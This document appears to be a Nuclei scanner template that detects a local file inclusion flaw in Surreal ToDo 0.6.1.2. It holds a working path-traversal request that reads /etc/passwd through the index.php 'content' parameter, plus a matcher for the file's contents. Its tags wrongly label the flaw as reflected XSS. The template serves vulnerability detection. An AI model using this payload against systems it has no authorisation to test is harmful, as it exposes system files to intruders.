27 lines
602 B
YAML
27 lines
602 B
YAML
|
id: surrealtodo-lfi
|
||
|
|
||
|
info:
|
||
|
name: Surreal ToDo 0.6.1.2 - Local File Inclusion
|
||
|
author: arafatansari
|
||
|
severity: medium
|
||
|
reference:
|
||
|
- https://www.exploit-db.com/exploits/45826
|
||
|
description: |
|
||
|
Surreal ToDo is affected by Local File Inclusion on index.php via content parameter.
|
||
|
tags: xss,unauthenticated,cms,reflected
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/index.php?content=../../../../../../../../etc/passwd"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:[x*]:0:0"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|